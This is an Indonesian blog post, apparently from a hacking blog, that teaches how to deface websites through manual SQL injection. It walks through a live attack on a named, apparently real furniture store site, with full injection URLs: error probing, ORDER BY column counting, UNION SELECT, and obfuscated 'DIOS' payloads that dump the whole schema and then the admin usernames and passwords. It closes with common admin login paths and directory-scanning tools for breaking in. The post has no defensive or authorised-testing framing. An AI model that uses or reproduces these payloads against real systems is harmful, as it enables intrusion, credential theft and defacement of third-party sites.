Header Ads

Masukan Kode License Disini.
Breaking News
recent

Deface metode sql injection manual with Dios

Assalamualaikum w.r w.b
Bertemu lagi dengan saya
Kali ini saya akan memberikan tutorial SQL Injection Manual

Oke.... disimak ya hehe :p

BAHAN
1.internet cuy yakali kaga pake internet
2.dork *kalian bisa cek dork disini > Dork SQL injection
3.web yg vuln sql injection
    *disini saya ada live target :
      http://rahmadewifurniture.com/media.php?module=detailproduk&id=460

yups langsung saja

- sekarang kita tambahkan '
jadinya seperti ini : http://rahmadewifurniture.com/media.php?module=detailproduk&id=460'  
- yaps disini kita menemukan error atau ada gambar yg hilang.
*seperti ini:
- lalu kita disini melakukan perintah +order+by+1--+
- misal seperti ini :
- lakukan order by hingga menemukan error lagi seperti ini saya menemuka error di angka 16.
- berarti kita hanya ambil sampai 15 saja karena error nya di 16.
- selanjutnya kita melakukan perintah +union+select+ dan menambahkan [ - ] sebelum angka
- jadinya seperti ini : http://rahmadewifurniture.com/media.php?module=detailproduk&id=-460'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--+
- yaps disini muncul angka togel ya itu 14 dan 3.
- agar tidak lama untuk mencari database table dan column kita menggunakan dios saja
- masukan dios ini
 [ /*!00000/*!00000(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,database(),0x3a3a,table_name,0x203a3a20,column_name))))x)*/ ]
- yaps disini langsung keluar database table dan column nya.
- selanjutnya kita tinggal ambil user / password admin.
- dengan cara memasukan dios berikut
  [ (/*!50000select*/(@x)from(/*!50000select*/(@x:=0x00),(/*!50000select*/(@x)from(namatable)where(@x)in(@x:=/*!50000concat*/(0x20,@x,0x3c62723e,namacolum,0x203a3a20,namacolum))))x) ]
- bisa dibilang seperti ini :
   http://rahmadewifurniture.com/media.php?module=detailproduk&id=-460'+union+select+1,2,(/*!50000select*/(@x)from(/*!50000select*/(@x:=0x00),(/*!50000select*/(@x)from(admins)where(@x)in(@x:=/*!50000concat*/(0x20,@x,0x3c62723e,username,0x203a3a20,password))))x),4,5,6,7,8,9,10,11,12,13,14,15--+
 *sesuaikan nama table dan colum nya ya..
- dan yaps sekarang kita sudah mendapatkan user dan password admin nya.
- tinggal kalian cari saja halaman admin nya biasanya di
* -/admin
   -/administrator
   -/login.php
   -/admin.php
- jika belum ketemu juga kalian bisa download dirbuster atau memakai admin finder online. :)

Yups cukup sekian tutorial kali ini semoga bermanfaat.
See you on the next tutorial....
and peaceee :p

Diberdayakan oleh Blogger.